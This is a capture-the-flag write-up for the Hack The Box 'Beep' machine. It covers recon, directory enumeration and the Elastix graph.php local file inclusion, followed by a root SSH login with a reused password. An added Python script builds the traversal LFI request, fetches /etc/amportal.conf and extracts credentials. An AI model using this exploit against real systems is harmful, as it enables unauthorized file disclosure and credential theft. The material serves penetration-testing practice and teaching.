HTB-Beep Write-Up
Reconnaissance
I used nmap to see what ports/services were showing as up and running.
Doing basic recon on what the scan showed as up, there appears to be a web server with a database backend and some sort of mail server. The next thing I did was pull up the website.
We have a website running Elastix, with a database backend storing the usernames and passwords used for access to this site.
Enumeration
I ran a quick Gobuster scan to see what directories are available on the website that I could glean more information from.
A couple of directories sparked my interest here: /admin, /recordings, and /vtigercrm.
So it appears to be an Elastix PBX with an online voicemail mailbox system. I decided to look up exploits for Elastix on searchsploit to see what's out there.
Exploitation
The most interesting one that caught my eye here was Elastix 2.2.0 - 'graph.php' Local File Inclusion. I looked up the source code for this so I could get a better understanding of what it does.
This part of the exploit stuck out to me because enumerating the directories had already told me there was a /vtigercrm directory, which is exactly where the exploit's request path (/vtigercrm/graph.php) points. So I decided to paste the request into the browser and see what happened.
The result was pretty unreadable in the rendered page, so I viewed the page source to see if it was formatted better. It looks like the exploit worked and returned a wealth of information that I could use to get into the system, and the raw source is a lot more readable.
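As an added example (not code from the original write-up or from the searchsploit entry), the script below does what the browser steps above do by hand: it builds the graph.php LFI request for /etc/amportal.conf and parses the returned key=value text for credentials. The raw response body is the included file itself, so parsing it line by line sidesteps the "unreadable in the browser" problem entirely. The host 10.10.10.7 is a placeholder, and SAMPLE_RESPONSE is a constructed amportal.conf-style sample with made-up values, not output captured from the box.

```python
"""Build the Elastix/vtigercrm graph.php LFI request and harvest credentials
from the amportal.conf text it returns.

Assumptions (added here, not from the write-up): the target host below is a
placeholder and SAMPLE_RESPONSE is a constructed sample in amportal.conf's
KEY=value format with invented values.
"""
import re
import ssl
import urllib.request
from urllib.parse import urlencode

TARGET = "https://10.10.10.7"  # placeholder host, substitute the real target

# Settings in amportal.conf that hold usable credentials.
CRED_KEYS = (
    "AMPDBUSER", "AMPDBPASS", "AMPMGRUSER", "AMPMGRPASS",
    "FOPPASSWORD", "ARI_ADMIN_USERNAME", "ARI_ADMIN_PASSWORD",
)

# Constructed sample of what the LFI returns; values are invented.
SAMPLE_RESPONSE = """\
# This file is part of FreePBX.
#
# AMPDBHOST: hostname of the database server
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBUSER: username to access the database
AMPDBUSER=asteriskuser
AMPDBPASS=ConstructedSamplePass1
AMPMGRUSER=admin
AMPMGRPASS=ConstructedSamplePass2
AMPWEBROOT=/var/www/html
FOPPASSWORD=ConstructedSamplePass3
"""


def lfi_url(base, path="/etc/amportal.conf", depth=8):
    """Return the graph.php URL that includes `path` through current_language.

    The traversal climbs `depth` directories to reach /, and the trailing
    null byte (%00) truncates the language-file suffix graph.php appends,
    which is what lets an arbitrary file be included on old PHP.
    """
    traversal = "../" * depth
    params = {
        "current_language": f"{traversal}{path.lstrip('/')}\x00",
        "module": "Accounts",
        "action": "",
    }
    # safe="/" keeps the traversal slashes literal, as in the public exploit.
    return f"{base}/vtigercrm/graph.php?{urlencode(params, safe='/')}"


def parse_amportal(text):
    """Parse KEY=value lines from amportal.conf text, skipping comments.

    Any HTML or other non-matching lines around the file content are ignored,
    so this works on the raw response body as returned by the LFI.
    """
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        match = re.match(r"^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$", line)
        if match:
            settings[match.group(1)] = match.group(2).strip()
    return settings


def credentials(settings):
    """Filter parsed settings down to the credential-bearing keys."""
    return {key: settings[key] for key in CRED_KEYS if key in settings}


def fetch_amportal(base=TARGET, timeout=10):
    """Fetch amportal.conf through the LFI. Elastix serves a self-signed
    certificate, so verification is disabled for this lab target only."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(lfi_url(base), context=ctx, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(lfi_url(TARGET))
    # Offline demonstration on the constructed sample.
    for key, value in credentials(parse_amportal(SAMPLE_RESPONSE)).items():
        print(f"{key} = {value}")
```

Against a live box, replace the SAMPLE_RESPONSE call with `fetch_amportal()`; the parser is the same. The AMP*PASS values are the ones worth trying against other services, since the write-up's root login relies on the same password being reused for the system account.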
Post-Exploitation
The exploit revealed the admin password. I decided to try to SSH into the system as root with that admin password, to see if I could root the box immediately. (The box runs an old SSH daemon, so a modern OpenSSH client may need legacy key exchange enabled, for example with -oKexAlgorithms=+diffie-hellman-group1-sha1, before it will connect.)
That worked and I was able to get the root flag.
From there, I went to /home to find the users and found the user flag.
Results Analysis
Elastix is prone to a local file inclusion vulnerability because graph.php fails to properly sanitize the user-supplied current_language parameter: directory traversal walks out of the language directory and a trailing null byte truncates the suffix the script appends, so an arbitrary file on disk can be included. The exploit took advantage of this to pull /etc/amportal.conf, and the data in it contained what was needed to root the box. The root compromise itself came from password reuse: the same password configured for the web application was also valid for root over SSH, so a read-only file disclosure became full system compromise.